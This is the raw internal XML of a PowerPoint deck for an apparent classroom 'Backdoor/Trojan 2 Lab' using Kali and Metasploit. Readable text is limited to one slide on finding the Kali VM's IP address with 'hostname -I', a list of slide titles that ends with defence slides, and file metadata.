          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the IP Address (Kali Machine)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B5DB-6E54-4C75-99F7-D5B878084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80400"/>
            <a:ext cx="7509510" cy="2892602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>You will need the IP address of the Kali machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Open the Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>In the Linux VM, open the Terminal and type the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hostname -I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This will display the IP Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Write down the Kali VM IP address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BC0E2-34A1-4AB1-96B1-B76907D7A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532" y="3146836"/>
            <a:ext cx="3808818" cy="725490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21BD53-5F4A-45C7-8DA1-06845E118AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141551" y="4306245"/>
            <a:ext cx="1633586" cy="1984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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1055" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The IP Address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306AE7-F1AE-450B-A06D-3FD65543C22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5661496" y="3562680"/>
            <a:ext cx="1296848" cy="743565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7430821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364DE382E3924D9716985E5EC9DD06" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="adee4d99a0ef3424d84f2af5ebc03541">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="421edf8b-0c99-44a8-81ee-8c3d4609cca6" xmlns:ns4="24f12f22-2052-46e3-ad3c-52792f2472db" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f45b4b2d7a3af1bd4fb33e73469554dd" ns3:_="" ns4:_="">
    <xsd:import namespace="421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <xsd:import namespace="24f12f22-2052-46e3-ad3c-52792f2472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edf8b-0c99-44a8-81ee-8c3d4609cc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f12f22-2052-46e3-ad3c-52792f2472d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9F9DFA-5A54-453E-BDD6-7A57FA6B8C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1edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472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B3ABB9-AA52-4D39-BFCC-72746F262919}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472db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3F1A304-3901-451F-B5BD-FD4B50969F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225</TotalTime>
  <Words>1054</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>146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Circe Light</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Medium</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Backdoor/Trojan 2 Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is a Backdoor Attack?</vt:lpstr>
      <vt:lpstr>What is a Trojan?</vt:lpstr>
      <vt:lpstr>The Trojan Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Find the IP Address (Kali Machine)</vt:lpstr>
      <vt:lpstr>Find the IP Address (Windows Machine)</vt:lpstr>
      <vt:lpstr>Verify Connection</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Start a Backdoor Attack</vt:lpstr>
      <vt:lpstr>Create the Trojan</vt:lpstr>
      <vt:lpstr>Install the Trojan</vt:lpstr>
      <vt:lpstr>Play the Victim</vt:lpstr>
      <vt:lpstr>Accessing the Backdoor</vt:lpstr>
      <vt:lpstr>Defend Against Backdoors</vt:lpstr>
      <vt:lpstr>Defend Against Trojans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dc:creator>Joseph MacAdam</dc:creator>
  <cp:lastModifiedBy>Richard Greene</cp:lastModifiedBy>
  <cp:revision>39</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T17:58:50Z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0x01010008364DE382E3924D9716985E5EC9DD06</vt:lpwstr>
  </property>
</Properties>
</file>